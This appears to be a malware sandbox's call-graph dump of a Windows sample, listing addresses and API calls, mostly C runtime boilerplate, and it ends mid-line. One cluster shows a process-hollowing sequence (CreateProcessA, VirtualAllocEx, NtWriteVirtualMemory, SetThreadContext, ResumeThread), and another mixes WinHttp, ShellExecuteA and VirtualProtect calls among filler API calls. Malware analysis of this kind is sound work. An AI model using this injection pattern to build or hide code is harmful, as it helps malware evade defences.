    %3 18448 27df6c 18451 27e590 18448->18451 18450 27df75 18452 27e5ac 18451->18452 18454 27f46c 18452->18454 18457 27e510 18454->18457 18460 27e53c 18457->18460 18458 27e542 GetFileAttributesA 18458->18460 18459 27e57e 18460->18458 18460->18459 18462 27e380 18460->18462 18463 27e453 18462->18463 18464 27e45a 18463->18464 18465 27e45f CreateWindowExA 18463->18465 18464->18460 18465->18464 18466 27e4a0 PostMessageA 18465->18466 18467 27e4bf 18466->18467 18467->18464 18469 27e080 VirtualAlloc GetModuleFileNameA 18467->18469 18470 27e0ed CreateProcessA 18469->18470 18481 27e368 18469->18481 18472 27e1cc VirtualAlloc 18470->18472 18470->18481 18474 27e20e 18472->18474 18475 27e216 ReadProcessMemory 18474->18475 18474->18481 18476 27e252 VirtualAllocEx NtWriteVirtualMemory 18475->18476 18477 27e242 18475->18477 18480 27e2a8 18476->18480 18477->18476 18478 27e30a WriteProcessMemory SetThreadContext ResumeThread 18478->18481 18479 27e2bd NtWriteVirtualMemory 18479->18480 18480->18478 18480->18479 18481->18467 18482 30071d1 18486 3006933 18482->18486 18485 30071f6 18488 300693c 18486->18488 18489 3006979 EncodePointer 18488->18489 18490 300695a Sleep 18488->18490 18492 3008a59 18488->18492 18489->18485 18491 300696f 18490->18491 18491->18488 18491->18489 18493 3008a65 18492->18493 18495 3008a80 18492->18495 18494 3008a71 18493->18494 18493->18495 18501 3003ea5 18494->18501 18496 3008a93 RtlAllocateHeap 18495->18496 18500 3008aba 18495->18500 18504 30070f3 DecodePointer 18495->18504 18496->18495 18496->18500 18500->18488 18506 3004cc7 GetLastError 18501->18506 18503 3003eaa 18503->18488 18505 3007108 18504->18505 18505->18495 18520 3004ba2 TlsGetValue 18506->18520 18509 3004d34 SetLastError 18509->18503 18510 3006933 __getptd 62 API calls 18511 3004cf2 18510->18511 18511->18509 18512 3004cfa DecodePointer 18511->18512 18513 3004d0f 18512->18513 18514 3004d2b 18513->18514 18515 3004d13 18513->18515 18536 3006891 18514->18536 18523 3004c13 18515->18523 18518 3004d1b GetCurrentThreadId 18518->18509 18519 3004d31 18519->18509 18521 3004bb7 DecodePointer TlsSetValue 18520->18521 18522 3004bd2 18520->18522 18521->18522 18522->18509 18522->18510 18542 3005030 18523->18542 18525 3004c1f GetModuleHandleW 18543 3006e8e 18525->18543 18527 3004c5d InterlockedIncrement 18550 3004cb5 18527->18550 18530 3006e8e ___crtLCMapStringA 64 API calls 18531 3004c7e 18530->18531 18553 3006558 InterlockedIncrement 18531->18553 18533 3004c9c 18565 3004cbe 18533->18565 18535 3004ca9 __CxxUnhandledExceptionFilter 18535->18518 18537 300689c HeapFree 18536->18537 18541 30068c5 __freea 18536->18541 18538 30068b1 18537->18538 18537->18541 18539 3003ea5 __freea 64 API calls 18538->18539 18540 30068b7 GetLastError 18539->18540 18540->18541 18541->18519 18542->18525 18544 3006ea3 18543->18544 18545 3006eb6 EnterCriticalSection 18543->18545 18568 3006dcc 18544->18568 18545->18527 18547 3006ea9 18547->18545 18593 300420b 18547->18593 18762 3006db5 LeaveCriticalSection 18550->18762 18552 3004c77 18552->18530 18554 3006579 18553->18554 18555 3006576 InterlockedIncrement 18553->18555 18556 3006586 18554->18556 18557 3006583 InterlockedIncrement 18554->18557 18555->18554 18558 3006593 18556->18558 18559 3006590 InterlockedIncrement 18556->18559 18557->18556 18560 300659d InterlockedIncrement 18558->18560 18561 30065a0 18558->18561 18559->18558 18560->18561 18562 30065b9 InterlockedIncrement 18561->18562 18563 30065d4 InterlockedIncrement 18561->18563 18564 30065c9 InterlockedIncrement 18561->18564 18562->18561 18563->18533 18564->18561 18763 3006db5 LeaveCriticalSection 18565->18763 18567 3004cc5 18567->18535 18569 3006dd8 __CxxUnhandledExceptionFilter 18568->18569 18582 3006dfe 18569->18582 18600 30043fe 18569->18600 18573 3006e19 18576 3006e2f 18573->18576 18577 3006e20 18573->18577 18574 3006e0e __CxxUnhandledExceptionFilter 18574->18547 18580 3006e8e ___crtLCMapStringA 65 API calls 18576->18580 18579 3003ea5 __freea 65 API calls 18577->18579 18578 3006df4 18633 3003f69 18578->18633 18579->18574 18583 3006e36 18580->18583 18582->18574 18636 30068ee 18582->18636 18584 3006e3e InitializeCriticalSectionAndSpinCount 18583->18584 18585 3006e69 18583->18585 18587 3006e4e 18584->18587 18588 3006e5a 18584->18588 18586 3006891 __freea 65 API calls 18585->18586 18586->18588 18589 3006891 __freea 65 API calls 18587->18589 18641 3006e85 18588->18641 18591 3006e54 18589->18591 18592 3003ea5 __freea 65 API calls 18591->18592 18592->18588 18594 30043fe __amsg_exit 66 API calls 18593->18594 18595 3004215 18594->18595 18596 300424f __amsg_exit 66 API calls 18595->18596 18597 300421d 18596->18597 18730 30041d7 18597->18730 18644 30076d8 18600->18644 18602 3004405 18603 3004412 18602->18603 18605 30076d8 __amsg_exit 66 API calls 18602->18605 18604 300424f __amsg_exit 66 API calls 18603->18604 18608 3004434 18603->18608 18606 300442a 18604->18606 18605->18603 18607 300424f __amsg_exit 66 API calls 18606->18607 18607->18608 18609 300424f 18608->18609 18610 3004270 __amsg_exit 18609->18610 18611 30076d8 __amsg_exit 63 API calls 18610->18611 18632 300438c 18610->18632 18615 300428a 18611->18615 18613 30043fc 18613->18578 18614 300439b GetStdHandle 18620 30043a9 _strlen 18614->18620 18614->18632 18615->18614 18616 30076d8 __amsg_exit 63 API calls 18615->18616 18617 300429b 18616->18617 18617->18614 18618 30042ad 18617->18618 18618->18632 18654 3007675 18618->18654 18622 30043df WriteFile 18620->18622 18620->18632 18622->18632 18623 30042d9 GetModuleFileNameW 18624 30042fa 18623->18624 18627 3004306 _wcslen 18623->18627 18625 3007675 __amsg_exit 63 API calls 18624->18625 18625->18627 18629 3007518 63 API calls __amsg_exit 18627->18629 18630 300437c 18627->18630 18663 3003e01 18627->18663 18666 300758d 18627->18666 18629->18627 18675 30073ac 18630->18675 18693 3006ba0 18632->18693 18709 3003f3e GetModuleHandleW 18633->18709 18638 30068f7 18636->18638 18639 300692d 18638->18639 18640 300690e Sleep 18638->18640 18713 30089c5 18638->18713 18639->18573 18640->18638 18729 3006db5 LeaveCriticalSection 18641->18729 18643 3006e8c 18643->18574 18645 30076e4 18644->18645 18646 3003ea5 __freea 66 API calls 18645->18646 18647 30076ee 18645->18647 18648 3007707 18646->18648 18647->18602 18651 3003e53 18648->18651 18652 3003e26 __cftof 11 API calls 18651->18652 18653 3003e5f 18652->18653 18653->18602 18655 300768a 18654->18655 18657 3007683 18654->18657 18656 3003ea5 __freea 66 API calls 18655->18656 18658 300768f 18656->18658 18657->18655 18661 30076ab 18657->18661 18659 3003e53 __cftof 11 API calls 18658->18659 18660 30042ce 18659->18660 18660->18623 18660->18627 18661->18660 18662 3003ea5 __freea 66 API calls 18661->18662 18662->18658 18701 3003cd8 18663->18701 18670 300759f 18666->18670 18667 30075a3 18668 3003ea5 __freea 66 API calls 18667->18668 18669 30075a8 18667->18669 18674 30075bf 18668->18674 18669->18627 18670->18667 18670->18669 18671 30075e6 18670->18671 18671->18669 18673 3003ea5 __freea 66 API calls 18671->18673 18672 3003e53 __cftof 11 API calls 18672->18669 18673->18674 18674->18672 18707 3004b90 EncodePointer 18675->18707 18677 30073d2 18678 30073e2 LoadLibraryW 18677->18678 18680 300745f 18677->18680 18679 30073f7 GetProcAddress 18678->18679 18689 30074f7 18678->18689 18684 300740d 7 API calls 18679->18684 18679->18689 18681 300748c 18680->18681 18685 3007479 DecodePointer DecodePointer 18680->18685 18682 30074c2 DecodePointer 18681->18682 18683 30074eb DecodePointer 18681->18683 18692 30074af 18681->18692 18682->18683 18690 30074c9 18682->18690 18683->18689 18684->18680 18687 300744f GetProcAddress EncodePointer 18684->18687 18685->18681 18686 3006ba0 setSBUpLow 5 API calls 18688 3007516 18686->18688 18687->18680 18688->18632 18689->18686 18690->18683 18691 30074dc DecodePointer 18690->18691 18691->18683 18691->18692 18692->18683 18694 3006ba8 18693->18694 18695 3006baa IsDebuggerPresent 18693->18695 18694->18613 18708 3006c45 18695->18708 18698 3008c55 SetUnhandledExceptionFilter UnhandledExceptionFilter 18699 3008c72 setSBUpLow 18698->18699 18700 3008c7a GetCurrentProcess TerminateProcess 18698->18700 18699->18700 18700->18613 18702 3003cf7 setSBUpLow 18701->18702 18703 3003d15 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18702->18703 18704 3003de3 setSBUpLow 18703->18704 18705 3006ba0 setSBUpLow 5 API calls 18704->18705 18706 3003dff GetCurrentProcess TerminateProcess 18705->18706 18706->18627 18707->18677 18708->18698 18710 3003f52 GetProcAddress 18709->18710 18711 3003f67 ExitProcess 18709->18711 18710->18711 18712 3003f62 18710->18712 18712->18711 18714 3008a42 18713->18714 18722 30089d3 18713->18722 18715 30070f3 __getbuf DecodePointer 18714->18715 18716 3008a48 18715->18716 18717 3003ea5 __freea 65 API calls 18716->18717 18728 3008a3a 18717->18728 18718 30043fe __amsg_exit 65 API calls 18718->18722 18719 3008a01 HeapAlloc 18719->18722 18719->18728 18720 300424f __amsg_exit 65 API calls 18720->18722 18721 3008a2e 18725 3003ea5 __freea 65 API calls 18721->18725 18722->18718 18722->18719 18722->18720 18722->18721 18723 30070f3 __getbuf DecodePointer 18722->18723 18724 3003f69 __getbuf 3 API calls 18722->18724 18726 3008a2c 18722->18726 18723->18722 18724->18722 18725->18726 18727 3003ea5 __freea 65 API calls 18726->18727 18727->18728 18728->18638 18729->18643 18733 3004081 18730->18733 18732 30041e8 18734 300408d __CxxUnhandledExceptionFilter 18733->18734 18735 3006e8e ___crtLCMapStringA 61 API calls 18734->18735 18736 3004094 18735->18736 18738 30040bf DecodePointer 18736->18738 18742 300413e 18736->18742 18740 30040d6 DecodePointer 18738->18740 18738->18742 18752 30040e9 18740->18752 18741 30041bb __CxxUnhandledExceptionFilter 18741->18732 18756 30041ac 18742->18756 18744 30041a3 18746 30041ac 18744->18746 18747 3003f69 __getbuf 3 API calls 18744->18747 18748 30041b9 18746->18748 18761 3006db5 LeaveCriticalSection 18746->18761 18747->18746 18748->18732 18750 3004100 DecodePointer 18755 3004b90 EncodePointer 18750->18755 18752->18742 18752->18750 18753 300410f DecodePointer DecodePointer 18752->18753 18754 3004b90 EncodePointer 18752->18754 18753->18752 18754->18752 18755->18752 18757 300418c 18756->18757 18758 30041b2 18756->18758 18757->18741 18760 3006db5 LeaveCriticalSection 18757->18760 18759 3006db5 __amsg_exit LeaveCriticalSection 18758->18759 18759->18757 18760->18744 18761->18748 18762->18552 18763->18567 18764 3003f30 SetUnhandledExceptionFilter 18765 3002d14 18803 3005030 18765->18803 18767 3002d20 GetStartupInfoW 18768 3002d34 HeapSetInformation 18767->18768 18769 3002d3f 18767->18769 18768->18769 18804 3005004 HeapCreate 18769->18804 18771 3002d8d 18774 3002d98 18771->18774 18897 3002ceb 18771->18897 18805 3004e89 GetModuleHandleW 18774->18805 18775 3002d9e 18776 3002da9 __RTC_Initialize 18775->18776 18777 3002ceb 66 API calls 18775->18777 18830 30048ff GetStartupInfoW 18776->18830 18777->18776 18779 3002dc3 GetCommandLineW 18843 30048a7 GetEnvironmentStringsW 18779->18843 18781 300420b __amsg_exit 66 API calls 18783 3002dc2 18781->18783 18783->18779 18784 3002dd3 18850 30047f9 GetModuleFileNameW 18784->18850 18787 3002de8 18856 30045c7 18787->18856 18788 300420b __amsg_exit 66 API calls 18788->18787 18790 3002dee 18791 3002df9 18790->18791 18793 300420b __amsg_exit 66 API calls 18790->18793 18870 3003fea 18791->18870 18793->18791 18794 3002e01 18795 300420b __amsg_exit 66 API calls 18794->18795 18796 3002e0c 18794->18796 18795->18796 18876 300966f 18796->18876 18799 3002e3c 18905 30041ed 18799->18905 18802 3002e41 __CxxUnhandledExceptionFilter 18803->18767 18804->18771 18806 3004ea6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18805->18806 18807 3004e9d 18805->18807 18811 3004ef0 TlsAlloc 18806->18811 18917 3004bd6 18807->18917 18812 3004f3e TlsSetValue 18811->18812 18813 3004fff 18811->18813 18812->18813 18814 3004f4f 18812->18814 18813->18775 18908 3003f93 18814->18908 18819 3004f97 DecodePointer 18822 3004fac 18819->18822 18820 3004ffa 18821 3004bd6 70 API calls 18820->18821 18821->18813 18822->18820 18823 3006933 __getptd 66 API calls 18822->18823 18824 3004fc2 18823->18824 18824->18820 18825 3004fca DecodePointer 18824->18825 18826 3004fdb 18825->18826 18826->18820 18827 3004fdf 18826->18827 18828 3004c13 __getptd 66 API calls 18827->18828 18829 3004fe7 GetCurrentThreadId 18828->18829 18829->18813 18831 3006933 __getptd 66 API calls 18830->18831 18834 300491d 18831->18834 18832 3004a92 18833 3004ac8 GetStdHandle 18832->18833 18835 3004b2c SetHandleCount 18832->18835 18837 3004ada GetFileType 18832->18837 18842 3004b00 InitializeCriticalSectionAndSpinCount 18832->18842 18833->18832 18834->18832 18836 3006933 __getptd 66 API calls 18834->18836 18838 3002db7 18834->18838 18839 3004a12 18834->18839 18835->18838 18836->18834 18837->18832 18838->18779 18838->18781 18839->18832 18840 3004a3e GetFileType 18839->18840 18841 3004a49 InitializeCriticalSectionAndSpinCount 18839->18841 18840->18839 18840->18841 18841->18838 18841->18839 18842->18832 18842->18838 18844 30048bc 18843->18844 18845 30048b8 18843->18845 18847 30068ee __getbuf 66 API calls 18844->18847 18845->18784 18848 30048de 18847->18848 18849 30048e5 FreeEnvironmentStringsW 18848->18849 18849->18784 18851 300482e _wparse_cmdline 18850->18851 18852 3002ddd 18851->18852 18853 300486b 18851->18853 18852->18787 18852->18788 18854 30068ee __getbuf 66 API calls 18853->18854 18855 3004871 _wparse_cmdline 18854->18855 18855->18852 18857 30045df _wcslen 18856->18857 18858 30045d7 18856->18858 18859 3006933 __getptd 66 API calls 18857->18859 18858->18790 18860 3004603 _wcslen 18859->18860 18860->18858 18861 3004659 18860->18861 18863 3006933 __getptd 66 API calls 18860->18863 18864 300467f 18860->18864 18865 3007675 __amsg_exit 66 API calls 18860->18865 18867 3004696 18860->18867 18862 3006891 __freea 66 API calls 18861->18862 18862->18858 18863->18860 18866 3006891 __freea 66 API calls 18864->18866 18865->18860 18866->18858 18868 3003e01 __amsg_exit 10 API calls 18867->18868 18869 30046a2 18868->18869 18869->18790 18871 3003ff8 18870->18871 18929 30068cb 18871->18929 18873 3004016 __initterm_e 18875 3004037 18873->18875 18932 300723e 18873->18932 18875->18794 18877 3009683 _strlen 18876->18877 18878 30096d0 GetColorSpace GetLogColorSpaceA ChoosePixelFormat SetICMMode 18877->18878 18880 300969f 18877->18880 18879 3009707 GetPrivateProfileSectionNamesA GetCalendarInfoW GetLocaleInfoW 18878->18879 18881 300973c 18879->18881 19003 300958a WinHttpCloseHandle WinHttpConnect 18880->19003 18881->18879 18883 3009774 LocalAlloc 18881->18883 18890 3009754 GetModuleHandleW 18881->18890 18885 30097ca VirtualProtect 18883->18885 18886 3009794 18883->18886 18884 30096a4 ShellExecuteA ShellAboutW ExtractIconA 19004 3002bd0 18884->19004 18887 30097f0 18885->18887 18888 30097e4 GetTickCount 18885->18888 18886->18885 18999 3009651 18887->18999 18888->18887 18888->18888 18890->18881 18894 30041c1 18895 3004081 __amsg_exit 66 API calls 18894->18895 18896 30041d2 18895->18896 18896->18799 18898 3002cfe 18897->18898 18899 3002cf9 18897->18899 18901 300424f __amsg_exit 66 API calls 18898->18901 18900 30043fe __amsg_exit 66 API calls 18899->18900 18900->18898 18902 3002d06 18901->18902 18903 3003f69 __getbuf 3 API calls 18902->18903 18904 3002d10 18903->18904 18904->18774 18906 3004081 __amsg_exit 66 API calls 18905->18906 18907 30041f8 18906->18907 18907->18802 18927 3004b90 EncodePointer 18908->18927 18910 3003f9b 18928 3006d03 EncodePointer 18910->18928 18912 3003fc1 EncodePointer EncodePointer EncodePointer EncodePointer 18913 3006d14 18912->18913 18915 3006d1f 18913->18915 18914 3006d29 InitializeCriticalSectionAndSpinCount 18914->18915 18916 3004f93 18914->18916 18915->18914 18915->18916 18916->18819 18916->18820 18918 3004bef 18917->18918 18919 3004be0 DecodePointer 18917->18919 18920 3004c0e 18918->18920 18921 3004c00 TlsFree 18918->18921 18919->18918 18922 3006d7a DeleteCriticalSection 18920->18922 18923 3006d92 18920->18923 18921->18920 18924 3006891 __freea 66 API calls 18922->18924 18925 3006da4 DeleteCriticalSection 18923->18925 18926 3004ea2 18923->18926 18924->18920 18925->18923 18926->18775 18927->18910 18928->18912 18930 30068d1 EncodePointer 18929->18930 18930->18930 18931 30068eb 18930->18931 18931->18873 18935 3007202 18932->18935 18934 300724b 18934->18875 18936 300720e __CxxUnhandledExceptionFilter 18935->18936 18943 3003f81 18936->18943 18942 300722f __CxxUnhandledExceptionFilter 18942->18934 18944 3006e8e ___crtLCMapStringA 66 API calls 18943->18944 18945 3003f88 18944->18945 18946 300711b DecodePointer DecodePointer 18945->18946 18947 30071ca 18946->18947 18948 3007149 18946->18948 18959 3007238 18947->18959 18948->18947 18962 3008d8b 18948->18962 18950 30071ad EncodePointer EncodePointer 18950->18947 18951 300715b 18951->18950 18952 3007176 18951->18952 18953 3007185 18951->18953 18969 300697f 18952->18969 18953->18947 18956 300717f 18953->18956 18955 300697f 70 API calls 18957 3007195 18955->18957 18956->18953 18956->18955 18958 300719b EncodePointer 18956->18958 18957->18947 18957->18958 18958->18950 18995 3003f8a 18959->18995 18963 3008dab HeapSize 18962->18963 18964 3008d96 18962->18964 18963->18951 18965 3003ea5 __freea 66 API calls 18964->18965 18966 3008d9b 18965->18966 18967 3003e53 __cftof 11 API calls 18966->18967 18968 3008da6 18967->18968 18968->18951 18971 3006988 18969->18971 18972 30069c7 18971->18972 18973 30069a8 Sleep 18971->18973 18974 3008adb 18971->18974 18972->18956 18973->18971 18975 3008af1 18974->18975 18976 3008ae6 18974->18976 18977 3008af9 18975->18977 18983 3008b06 18975->18983 18978 30089c5 __getbuf 66 API calls 18976->18978 18980 3006891 __freea 66 API calls 18977->18980 18979 3008aee 18978->18979 18979->18971 18982 3008b01 __freea 18980->18982 18981 3008b3e 18985 30070f3 __getbuf DecodePointer 18981->18985 18982->18971 18983->18981 18984 3008b0e HeapReAlloc 18983->18984 18987 3008b6e 18983->18987 18990 30070f3 __getbuf DecodePointer 18983->18990 18992 3008b56 18983->18992 18984->18982 18984->18983 18986 3008b44 18985->18986 18988 3003ea5 __freea 66 API calls 18986->18988 18989 3003ea5 __freea 66 API calls 18987->18989 18988->18982 18991 3008b73 GetLastError 18989->18991 18990->18983 18991->18982 18993 3003ea5 __freea 66 API calls 18992->18993 18994 3008b5b GetLastError 18993->18994 18994->18982 18998 3006db5 LeaveCriticalSection 18995->18998 18997 3003f91 18997->18942 18998->18997 19000 300965a 18999->19000 19002 3002e2e 18999->19002 19000->19002 19015 30095c2 19000->19015 19002->18799 19002->18894 19003->18884 19005 3002bee 19004->19005 19006 3002c03 19004->19006 19008 3003ea5 __freea 66 API calls 19005->19008 19006->19005 19007 3002c0a 19006->19007 19018 300311d 19007->19018 19009 3002bf3 19008->19009 19011 3003e53 __cftof 11 API calls 19009->19011 19012 3002bfe 19011->19012 19012->18878 19016 30095ff GetLastError 19015->19016 19016->19016 19017 3009642 19016->19017 19017->19000 19060 3002fef 19018->19060 19020 3003188 19021 3003ea5 __freea 66 API calls 19020->19021 19023 300318d 19021->19023 19025 3003e53 __cftof 11 API calls 19023->19025 19026 3003198 19025->19026 19027 3006ba0 setSBUpLow 5 API calls 19026->19027 19028 3002c30 19027->19028 19028->19012 19039 3002e8b 19028->19039 19030 30031bf _strlen __aulldvrm 19030->19020 19030->19026 19031 3003076 97 API calls 19030->19031 19032 3006891 __freea 66 API calls 19030->19032 19033 3003814 DecodePointer 19030->19033 19034 30030a9 97 API calls 19030->19034 19035 30068ee __getbuf 66 API calls 19030->19035 19036 300387d DecodePointer 19030->19036 19037 300389e DecodePointer 19030->19037 19038 3006b38 78 API calls __cftof 19030->19038 19075 3006b55 19030->19075 19031->19030 19032->19030 19033->19030 19034->19030 19035->19030 19036->19030 19037->19030 19038->19030 19040 3005e4e 66 API calls 19039->19040 19041 3002e9b 19040->19041 19042 3002ea6 19041->19042 19043 3002ebd 19041->19043 19045 3003ea5 __freea 66 API calls 19042->19045 19044 3002ec1 19043->19044 19047 3002ece 19043->19047 19046 3003ea5 __freea 66 API calls 19044->19046 19048 3002eab 19045->19048 19046->19048 19047->19048 19049 3002f2f 19047->19049 19057 3002f24 19047->19057 19388 3005c43 19047->19388 19048->19012 19050 3002f3e 19049->19050 19051 3002fbe 19049->19051 19052 3002f55 19050->19052 19055 3002f72 19050->19055 19053 3005b26 97 API calls 19051->19053 19400 3005b26 19052->19400 19053->19048 19055->19048 19425 300533f 19055->19425 19057->19049 19397 3005bfa 19057->19397 19061 3003002 19060->19061 19062 300304f 19060->19062 19078 3004d40 19061->19078 19062->19020 19062->19030 19068 3005e4e 19062->19068 19065 300302f 19065->19062 19098 3006097 19065->19098 19069 3005e6f 19068->19069 19070 3005e5a 19068->19070 19069->19030 19071 3003ea5 __freea 66 API calls 19070->19071 19072 3005e5f 19071->19072 19073 3003e53 __cftof 11 API calls 19072->19073 19074 3005e6a 19073->19074 19074->19030 19076 3002fef ___crtLCMapStringA 76 API calls 19075->19076 19077 3006b68 19076->19077 19077->19030 19079 3004cc7 __getptd 66 API calls 19078->19079 19080 3004d48 19079->19080 19081 300420b __amsg_exit 66 API calls 19080->19081 19082 3003007 19080->19082 19081->19082 19082->19065 19083 3006818 19082->19083 19084 3006824 __CxxUnhandledExceptionFilter 19083->19084 19085 3004d40 __getptd 66 API calls 19084->19085 19086 3006829 19085->19086 19087 3006857 19086->19087 19088 300683b 19086->19088 19089 3006e8e ___crtLCMapStringA 66 API calls 19087->19089 19091 3004d40 __getptd 66 API calls 19088->19091 19090 300685e 19089->19090 19114 30067cb 19090->19114 19094 3006840 19091->19094 19096 300420b __amsg_exit 66 API calls 19094->19096 19097 300684e __CxxUnhandledExceptionFilter 19094->19097 19096->19097 19097->19065 19099 30060a3 __CxxUnhandledExceptionFilter 19098->19099 19100 3004d40 __getptd 66 API calls 19099->19100 19101 30060a8 19100->19101 19102 30060ba 19101->19102 19103 3006e8e ___crtLCMapStringA 66 API calls 19101->19103 19106 300420b __amsg_exit 66 API calls 19102->19106 19108 30060c8 __CxxUnhandledExceptionFilter 19102->19108 19104 30060d8 19103->19104 19105 3006121 19104->19105 19109 30060ef InterlockedDecrement 19104->19109 19110 3006109 InterlockedIncrement 19104->19110 19384 3006132 19105->19384 19106->19108 19108->19062 19109->19110 19111 30060fa 19109->19111 19110->19105 19111->19110 19112 3006891 __freea 66 API calls 19111->19112 19113 3006108 19112->19113 19113->19110 19115 30067d8 19114->19115 19121 300680d 19114->19121 19116 3006558 __getptd 8 API calls 19115->19116 19115->19121 19117 30067ee 19116->19117 19117->19121 19125 30065e7 19117->19125 19122 3006885 19121->19122 19383 3006db5 LeaveCriticalSection 19122->19383 19124 300688c 19124->19094 19126 300667b 19125->19126 19127 30065f8 InterlockedDecrement 19125->19127 19126->19121 19139 3006680 19126->19139 19128 300660d InterlockedDecrement 19127->19128 19129 3006610 19127->19129 19128->19129 19130 300661a InterlockedDecrement 19129->19130 19131 300661d 19129->19131 19130->19131 19132 300662a 19131->19132 19133 3006627 InterlockedDecrement 19131->19133 19134 3006634 InterlockedDecrement 19132->19134 19136 3006637 19132->19136 19133->19132 19134->19136 19135 3006650 InterlockedDecrement 19135->19136 19136->19135 19137 3006660 InterlockedDecrement 19136->19137 19138 300666b InterlockedDecrement 19136->19138 19137->19136 19138->19126 19140 3006704 19139->19140 19142 3006697 19139->19142 19141 3006751 19140->19141 19143 3006891 __freea 66 API calls 19140->19143 19154 300677a 19141->19154 19209 30084de 19141->19209 19142->19140 19145 30066cb 19142->19145 19151 3006891 __freea 66 API calls 19142->19151 19146 3006725 19143->19146 19149 30066ec 19145->19149 19160 3006891 __freea 66 API calls 19145->19160 19148 3006891 __freea 66 API calls 19146->19148 19155 3006738 19148->19155 19150 3006891 __freea 66 API calls 19149->19150 19156 30066f9 19150->19156 19158 30066c0 19151->19158 19152 3006891 __freea 66 API calls 19152->19154 19153 30067bf 19157 3006891 __freea 66 API calls 19153->19157 19154->19153 19161 3006891 66 API calls __freea 19154->19161 19159 3006891 __freea 66 API calls 19155->19159 19162 3006891 __freea 66 API calls 19156->19162 19163 30067c5 19157->19163 19169 30088be 19158->19169 19166 3006746 19159->19166 19165 30066e1 19160->19165 19161->19154 19162->19140 19163->19121 19197 3008855 19165->19197 19167 3006891 __freea 66 API calls 19166->19167 19167->19141 19170 30088cf 19169->19170 19171 30089b8 19169->19171 19172 30088e0 19170->19172 19173 3006891 __freea 66 API calls 19170->19173 19171->19145 19174 30088f2 19172->19174 19176 3006891 __freea 66 API calls 19172->19176 19173->19172 19175 3008904 19174->19175 19177 3006891 __freea 66 API calls 19174->19177 19178 3006891 __freea 66 API calls 19175->19178 19180 3008916 19175->19180 19176->19174 19177->19175 19178->19180 19179 3006891 __freea 66 API calls 19183 3008928 19179->19183 19180->19179 19180->19183 19181 300893a 19184 3006891 __freea 66 API calls 19181->19184 19185 300894c 19181->19185 19182 3006891 __freea 66 API calls 19182->19181 19183->19181 19183->19182 19184->19185 19186 3006891 __freea 66 API calls 19185->19186 19188 300895e 19185->19188 19186->19188 19187 3006891 __freea 66 API calls 19189 3008970 19187->19189 19188->19187 19188->19189 19190 3006891 __freea 66 API calls 19189->19190 19191 3008982 19189->19191 19190->19191 19192 3006891 __freea 66 API calls 19191->19192 19193 3008994 19191->19193 19192->19193 19194 3006891 __freea 66 API calls 19193->19194 19195 30089a6 19193->19195 19194->19195 19195->19171 19196 3006891 __freea 66 API calls 19195->19196 19196->19171 19198 3008862 19197->19198 19208 30088ba 19197->19208 19199 3006891 __freea 66 API calls 19198->19199 19200 3008872 19198->19200 19199->19200 19201 3008884 19200->19201 19202 3006891 __freea 66 API calls 19200->19202 19203 3006891 __freea 66 API calls 19201->19203 19206 3008896 19201->19206 19202->19201 19203->19206 19204 30088a8 19207 3006891 __freea 66 API calls 19204->19207 19204->19208 19205 3006891 __freea 66 API calls 19205->19204 19206->19204 19206->19205 19207->19208 19208->19149 19210 30084ef 19209->19210 19382 300676f 19209->19382 19211 3006891 __freea 66 API calls 19210->19211 19212 30084f7 19211->19212 19213 3006891 __freea 66 API calls 19212->19213 19214 30084ff 19213->19214 19215 3006891 __freea 66 API calls 19214->19215 19216 3008507 19215->19216 19217 3006891 __freea 66 API calls 19216->19217 19218 300850f 19217->19218 19219 3006891 __freea 66 API calls 19218->19219 19220 3008517 19219->19220 19221 3006891 __freea 66 API calls 19220->19221 19222 300851f 19221->19222 19223 3006891 __freea 66 API calls 19222->19223 19224 3008526 19223->19224 19225 3006891 __freea 66 API calls 19224->19225 19226 300852e 19225->19226 19227 3006891 __freea 66 API calls 19226->19227 19228 3008536 19227->19228 19229 3006891 __freea 66 API calls 19228->19229 19230 300853e 19229->19230 19231 3006891 __freea 66 API calls 19230->19231 19232 3008546 19231->19232 19233 3006891 __freea 66 API calls 19232->19233 19234 300854e 19233->19234 19235 3006891 __freea 66 API calls 19234->19235 19236 3008556 19235->19236 19237 3006891 __freea 66 API calls 19236->19237 19238 300855e 19237->19238 19239 3006891 __freea 66 API calls 19238->19239 19240 3008566 19239->19240 19241 3006891 __freea 66 API calls 19240->19241 19242 300856e 19241->19242 19243 3006891 __freea 66 API calls 19242->19243 19244 3008579 19243->19244 19245 3006891 __freea 66 API calls 19244->19245 19246 3008581 19245->19246 19247 3006891 __freea 66 API calls 19246->19247 19248 3008589 19247->19248 19249 3006891 __freea 66 API calls 19248->19249 19250 3008591 19249->19250 19251 3006891 __freea 66 API calls 19250->19251 19252 3008599 19251->19252 19253 3006891 __freea 66 API calls 19252->19253 19254 30085a1 19253->19254 19255 3006891 __freea 66 API calls 19254->19255 19256 30085a9 19255->19256 19257 3006891 __freea 66 API calls 19256->19257 19258 30085b1 19257->19258 19259 3006891 __freea 66 API calls 19258->19259 19260 30085b9 19259->19260 19261 3006891 __freea 66 API calls 19260->19261 19262 30085c1 19261->19262 19263 3006891 __freea 66 API calls 19262->19263 19264 30085c9 19263->19264 19265 3006891 __freea 66 API calls 19264->19265 19266 30085d1 19265->19266 19267 3006891 __freea 66 API calls 19266->19267 19268 30085d9 19267->19268 19269 3006891 __freea 66 API calls 19268->19269 19270 30085e1 19269->19270 19271 3006891 __freea 66 API calls 19270->19271 19272 30085e9 19271->19272 19273 3006891 __freea 66 API calls 19272->19273 19274 30085f1 19273->19274 19275 3006891 __freea 66 API calls 19274->19275 19276 30085ff 19275->19276 19277 3006891 __freea 66 API calls 19276->19277 19278 300860a 19277->19278 19279 3006891 __freea 66 API calls 19278->19279 19280 3008615 19279->19280 19281 3006891 __freea 66 API calls 19280->19281 19282 3008620 19281->19282 19283 3006891 __freea 66 API calls 19282->19283 19284 300862b 19283->19284 19285 3006891 __freea 66 API calls 19284->19285 19286 3008636 19285->19286 19287 3006891 __freea 66 API calls 19286->19287 19288 3008641 19287->19288 19289 3006891 __freea 66 API calls 19288->19289 19290 300864c 19289->19290 19291 3006891 __freea 66 API calls 19290->19291 19292 3008657 19291->19292 19293 3006891 __freea 66 API calls 19292->19293 19294 3008662 19293->19294 19295 3006891 __freea 66 API calls 19294->19295 19296 300866d 19295->19296 19297 3006891 __freea 66 API calls 19296->19297 19298 3008678 19297->19298 19299 3006891 __freea 66 API calls 19298->19299 19300 3008683 19299->19300 19301 3006891 __freea 66 API calls 19300->19301 19302 300868e 19301->19302 19303 3006891 __freea 66 API calls 19302->19303 19304 3008699 19303->19304 19305 3006891 __freea 66 API calls 19304->19305 19306 